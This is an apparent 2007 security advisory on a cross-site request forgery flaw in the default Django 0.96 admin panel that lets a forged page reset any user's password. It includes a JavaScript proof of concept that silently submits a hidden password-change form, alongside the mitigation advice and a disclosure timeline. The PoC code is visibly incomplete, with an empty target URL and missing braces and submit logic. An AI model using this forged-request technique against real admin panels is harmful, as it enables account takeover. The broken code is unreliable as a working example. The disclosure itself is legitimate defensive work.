Django 0.96 (stable) Admin Panel CSRF Oct 29 2007 11:29PM
J. Carlos Nieto (xiam xiam be)

Author: J. Carlos Nieto.
Date: Oct 21, 2007

There exists a security hole in the default django's admin panel.

Django is a high-level Python Web framework that encourages rapid
development and clean, pragmatic design.
Django has an automatic admin panel that allows a person with admin
privileges to modify the database tables, it allows to change any user
password too.
See more at http://www.djangoproject.com

django has, by default, no CSRF protection, this may allow an attacker
to change any user password by tricking a victim with admin privileges
into a special forged web page (even in a a totally different server)
that sends a request to change the password of the user with id = n. The
victim does not know that the form was sent. If the victim has admin
privileges the exploit will succeed, otherwise nothing will happen.

Mild. This problem exists only with the default installation and can be
easily solved using a middleware found in here:

Proof of concept
<script type="text/javascript">
window.onload = function() {
var url = "";

var pass = "funky";

var param = {
password1: pass,
password2: pass

var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';

for (var i in param) {
try {
// ie
var input = document.createElement('<input name="'+i+'">');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
input.setAttribute('value', param[i]);


<iframe name="hidden" style="display: none"></iframe>

Use the django's CSRF protection in all your applications. Take a look
at http://www.djangoproject.com/documentation/csrf/.

Disclosure Timeline
2007.10.18 - Vulnerability found
2007.10.18 - Vulnerability reported to vendor
2007.10.18 - Vendor response
2007.10.21 - Advisory release


Copyright 2007 J. Carlos Nieto

The contents of this document are licensed under the Creative Commons -
Attribution / Share Alike license.

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus